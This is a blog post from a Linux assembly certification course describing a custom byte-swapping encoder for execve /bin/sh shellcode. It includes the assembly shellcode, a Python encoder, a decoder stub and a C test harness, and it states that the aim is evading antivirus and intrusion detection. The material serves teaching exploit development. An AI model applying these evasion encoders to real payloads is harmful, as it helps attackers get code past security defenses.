Oleg's Web Log

Stochastic records on Information Security and IT in general

Custom encoding scheme in Assembly (SLAE, Assignment #4)

Category: Exploit development

Written on

The terms encoding and encryption are sometimes used interchangeably to describe a process of data transformation, but there is a difference. The purpose of encoding is to transform data so that it can be properly consumed by a different type of system. Encoding transforms data into another format using a scheme that is publicly available and does not require a key. The purpose of encryption, on the other hand, is to keep data secret from others, so that it can only be consumed by the intended recipient. Encryption usually transforms (encrypts/decrypts) data using a secret key, and the algorithm may or may not be publicly available.
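
To make the distinction concrete, here is a minimal Python sketch. It is only an illustration: Base64 stands in for "a publicly available scheme without a key", and a toy XOR (which is not real encryption) stands in for "a transformation that needs a secret key". The key value and the helper name xor_with_key are made up for this example.

```python
import base64

data = b"/bin/sh"

# Encoding: the scheme is public and keyless, so anyone can reverse it.
encoded = base64.b64encode(data)
assert base64.b64decode(encoded) == data

# Keyed transformation (toy XOR, NOT real encryption):
# reversing it requires knowing the same key.
def xor_with_key(payload: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(payload))

key = b"\x5a\xa5"  # hypothetical secret key, chosen only for illustration
scrambled = xor_with_key(data, key)

assert xor_with_key(scrambled, key) == data           # right key recovers data
assert xor_with_key(scrambled, b"\x00\x01") != data   # wrong key does not
print(encoded, scrambled.hex())
```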

I thought about which kind of data transformation this post deals with. Because no secret key is involved, and the shellcode is transformed only so that it can be safely consumed by the decoding stub, I decided that it is proper to call it an encoding scheme.

The purpose of a custom encoding scheme in exploit development is to evade antivirus software and intrusion detection systems. When crafting one, keep in mind that its job is, more often than not, to fool signature-based software, not an intelligent human who has dedicated their life to breaking encryption algorithms. So it doesn't have to be complicated.

To apply the encoding scheme to a shellcode, one usually creates a separate encoder and a decoding stub. The stub becomes part of the new shellcode and decodes the main encoded payload before transferring execution to it.

Before describing the encoding scheme I came up with, let's first create a shellcode to work with. I will use the shell-starting shellcode:

section .text
    global _start

_start:
    xor eax, eax
    push eax            ; null terminator for the string
    push 0x68732f6e     ; "n/sh"
    push 0x69622f2f     ; "//bi"
    mov ebx, esp        ; put string address into ebx
    xor ecx, ecx        ; args
    xor edx, edx        ; env vars
    mov al, 11          ; execve syscall number
    int 80h

nasm -f elf stacksh.asm && ld stacksh.o -o stacksh && ./stacksh
scdump stacksh

Output from the last command (formatted to fit the screen):

Length:  23
Payload: "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9"
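
The two push constants in the shellcode are just the string //bin/sh split into two little-endian dwords (the extra slash pads the path to 8 bytes). As a quick sanity check, the following Python sketch derives them with the standard struct module; the variable names are mine and are not part of the assignment code.

```python
import struct

path = b"//bin/sh"  # 8 bytes, so it splits into exactly two dwords

# "<II" unpacks two little-endian 32-bit unsigned integers.
first, second = struct.unpack("<II", path)

# The stack grows downwards, so the last four bytes are pushed first.
print("push 0x{:08x}".format(second))  # prints: push 0x68732f6e
print("push 0x{:08x}".format(first))   # prints: push 0x69622f2f
```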

The encoding scheme itself is super simple. It just swaps each pair of adjacent bytes. For it to work correctly, the shellcode length must be even. So, if it is not, the encoder appends a no-operation \x90 byte to satisfy the requirement. The encoder implementation in Python follows:

#!/usr/bin/env python

# Author: Oleg Mitrofanov (reider-roque) 2015

import os.path
import sys

def hexlify(data): 
    return "".join("\\x{:02x}".format(ord(c)) for c in data)

def hexlify_nasm(data): 
    return "".join("0x{:02x},".format(ord(c)) for c in data)[:-1]

def unhexlify(data):
    return "".join([chr(int(num, 16)) for num in data[2:].split("\\x")])

script_name = os.path.basename(__file__)
if len(sys.argv) != 2:
    print("Error: invalid number of arguments")
    print("Usage:\n\t{} SHELLCODE".format(script_name)) 
    print("Example:\n\t{} '\\xaa\\xbb\\xcc\\xdd'".format(script_name))
    sys.exit(1)  # stop here instead of failing on a missing argument

cleartext = unhexlify(sys.argv[1])

if len(cleartext) % 2 != 0:
    cleartext += chr(0x90)

encrypted = ''
for i in range(0, len(cleartext), 2):
    encrypted += cleartext[i+1] + cleartext[i]

print('Standard:  {}'.format(hexlify(encrypted)))
print('NASM:      {}'.format(hexlify_nasm(encrypted)))
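
A useful property of this scheme is that swapping adjacent bytes is its own inverse: applying the same transformation twice returns the (padded) original. The sketch below is a compact Python 3 variant working on bytes objects, written only to demonstrate that property; swap_pairs is a name I made up, and this is not the script used in the assignment. The input is the 23-byte shell-starting shellcode.

```python
def swap_pairs(data: bytes) -> bytes:
    """Swap each pair of adjacent bytes, padding odd-length input with a NOP."""
    if len(data) % 2:
        data += b"\x90"
    out = bytearray(data)
    # Even positions receive the odd-position bytes and vice versa.
    out[0::2], out[1::2] = data[1::2], data[0::2]
    return bytes(out)

original = bytes.fromhex("31c050686e2f7368682f2f626989e331c931d2b00bcd80")
encoded = swap_pairs(original)
decoded = swap_pairs(encoded)  # encoding again undoes the swap

print(encoded.hex())
assert decoded == original + b"\x90"
```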

Let's encode the main payload:

./xchgencoder "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"

Output (formatted to fit the screen):

Standard:  \xc0\x31\x68\x50\x2f\x6e\x68\x73\x2f\x68\x62\x2f\x89\x69\x31\xe3\x31
NASM:      0xc0,0x31,0x68,0x50,0x2f,0x6e,0x68,0x73,0x2f,0x68,0x62,0x2f,0x89,0x69,

Once the encoded payload was ready, all I needed to do was write the decoder stub in Assembly. The decoding stub first decodes the main payload and then transfers execution to where the payload begins:

section .text
    global _start

_start:
    jmp .data           ; jump to the call placed right before the payload
.code:
    pop esi             ; Point ESI to the beginning of the shellcode
    push shellcode_len  ; Put (shellcode length)/2 into ECX
    pop ecx
    xor eax, eax
.decrypt:
    lodsw            ; load two shellcode bytes into AX
    mov [esi-1], al  ; and switch them
    shr eax, 8
    mov [esi-2], al
    loop .decrypt    
    jmp shellcode

.data:
    call .code          ; pushes the address of the shellcode onto the stack
    shellcode: db 0xc0,0x31,0x68,0x50,0x2f,0x6e,0x68,0x73,0x2f,0x68,0x62,0x2f
    sc_continued: db 0x89,0x69,0x31,0xe3,0x31,0xc9,0xb0,0xd2,0xcd,0x0b,0x90,0x80
    shellcode_len: equ ($-shellcode)/2

In the above code, to make the long shellcode fit the screen while keeping the code executable (in case you are copy-pasting), I divided it into two parts, with the second labeled sc_continued. In the actual source code it is just one long line of comma-separated bytes labeled shellcode.
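
To convince yourself that the decoding loop does what it should before assembling anything, it can be modeled in a few lines of Python. This is only a rough simulation under simplifying assumptions: the payload is a bytearray, ESI is an offset into it rather than an address, and run_decoder_stub is a hypothetical helper name. The comments map each statement to the corresponding instruction of the stub.

```python
def run_decoder_stub(encoded: bytes) -> bytes:
    mem = bytearray(encoded)   # writable copy of the encoded payload
    esi = 0                    # pop esi: offset of the next word to load
    ecx = len(mem) // 2        # push shellcode_len / pop ecx: number of pairs
    eax = 0                    # xor eax, eax
    while ecx:
        # lodsw: AX = little-endian word at [ESI], then ESI += 2
        eax = (eax & 0xFFFF0000) | mem[esi] | (mem[esi + 1] << 8)
        esi += 2
        mem[esi - 1] = eax & 0xFF  # mov [esi-1], al
        eax >>= 8                  # shr eax, 8 (old AH becomes AL)
        mem[esi - 2] = eax & 0xFF  # mov [esi-2], al
        ecx -= 1                   # loop .decrypt
    return bytes(mem)

encoded = bytes.fromhex("c03168502f6e68732f68622f896931e331c9b0d2cd0b9080")
decoded = run_decoder_stub(encoded)
print(decoded.hex())
```

The result is the original 23-byte shellcode followed by the padding \x90 byte.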

It's time to build another binary and extract the resulting shellcode:

nasm -f elf xchgdecoder.asm && ld -o xchgdecoder xchgdecoder.o
scdump xchgdecoder


Length:  52
Payload: "\xeb\x15\x5e\x6a\x0c\x59\x31\xc0\x66\xad\x88\x46\xff\xc1\xe8\x08\x88"

Remember that if you run ./xchgdecoder by itself, you'll get a segmentation fault as soon as the decoder stub tries to overwrite the first byte of the encoded payload. With the default link settings the .text section is mapped as read-only, so the code in it cannot modify itself.

To test that the whole encoding business actually works, we'll need the help of a small C program. Here is the source code that tests our shellcode:

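#include <stdio.h>
#include <string.h>

/* Shortened to fit the screen; paste the full 52-byte payload from scdump. */
unsigned char shellcode[] = "\xeb\x15\x5e\x6a\x0c\x59\x31\xc0\x66\xad\x88\x46\xff";

int main(void)
{
    printf("Shellcode length: %zu\n", strlen((char *)shellcode));

    /* Treat the byte array as a function and call it. */
    void (*run)(void) = (void (*)(void))shellcode;
    run();

    return 0;
}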

And that's how we build a binary out of it and run the result:

gcc -fno-stack-protector -z execstack -o scframe scframe.c && ./scframe

[Screenshot: working encoded shellcode]

It works!

This blog post was created to fulfill the requirements of the SecurityTube Linux Assembly Expert certification. Student id: SLAE-685.

The source files created while completing the assignment can be found in my GitHub repository.
